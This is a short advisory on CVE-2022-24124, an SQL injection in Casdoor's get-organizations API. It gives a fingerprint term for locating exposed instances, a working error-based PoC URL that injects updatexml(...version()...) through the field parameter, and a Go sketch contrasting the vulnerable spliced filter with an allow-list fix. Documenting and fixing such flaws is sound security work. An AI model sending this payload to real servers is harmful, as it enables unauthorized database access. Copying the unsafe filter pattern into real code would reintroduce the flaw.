Casdoor get-organizations SQL injection vulnerability CVE-2022-24124

Vulnerability Description

Casdoor is a UI-first centralized authentication / single sign-on (SSO) platform based on OAuth 2.0 / OIDC. Simply put, Casdoor takes over user management: you do not need to develop user-authentication functions such as login and registration yourself. With a few steps of simple configuration, it works alongside your main application and fully hosts your user module. Its get-organizations API is vulnerable to SQL injection (CVE-2022-24124); in the PoC below the payload is carried in the field query parameter.

Vulnerability Impact

Casdoor

Network surveying and mapping

“Casdoor”

Vulnerability reproduction

[Screenshot: login page]

PoC verification

/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)

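The request above works because a column name cannot be bound as a SQL parameter, so a filter built from the field value ends up in the statement text. The following Go sketch is an added example, not Casdoor's code or its actual fix: it contrasts that vulnerable shape with an allow-list mapping. The function names, the allowedFields table and the LIKE clause shape are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
)

// Hypothetical allow-list: API field name -> real column name (not Casdoor's schema).
var allowedFields = map[string]string{
	"name":        "name",
	"displayName": "display_name",
	"owner":       "owner",
}

var ErrBadField = errors.New("field is not an allowed column")

// UnsafeFilter shows the vulnerable shape: field is spliced into the SQL text,
// so whatever the client sends there is parsed as SQL. Only value is bound.
func UnsafeFilter(field, value string) (string, []interface{}) {
	return fmt.Sprintf("%s LIKE ?", field), []interface{}{"%" + value + "%"}
}

// SafeFilter resolves field through the allow-list and binds value as a parameter.
// The client-supplied string itself never reaches the statement text.
func SafeFilter(field, value string) (string, []interface{}, error) {
	if field == "" {
		return "", nil, nil // no filter requested
	}
	col, ok := allowedFields[field]
	if !ok {
		return "", nil, ErrBadField
	}
	return fmt.Sprintf("`%s` LIKE ?", col), []interface{}{"%" + value + "%"}, nil
}

// FilterFromQuery applies SafeFilter to the field/value pair of a raw query string.
func FilterFromQuery(rawQuery string) (string, []interface{}, error) {
	q, err := url.ParseQuery(rawQuery)
	if err != nil {
		return "", nil, err
	}
	return SafeFilter(q.Get("field"), q.Get("value"))
}

func main() {
	// Constructed inputs: a normal filter, then the query string from the PoC on this page.
	for _, raw := range []string{
		"p=1&pageSize=10&value=cfx&field=name",
		"p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)",
	} {
		clause, args, err := FilterFromQuery(raw)
		fmt.Printf("clause=%q args=%v err=%v\n", clause, args, err)
	}
}
```

The same allow-list approach applies to sortField and sortOrder, which are also identifiers or keywords rather than bindable values.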

This post is licensed under CC BY 4.0 by the author.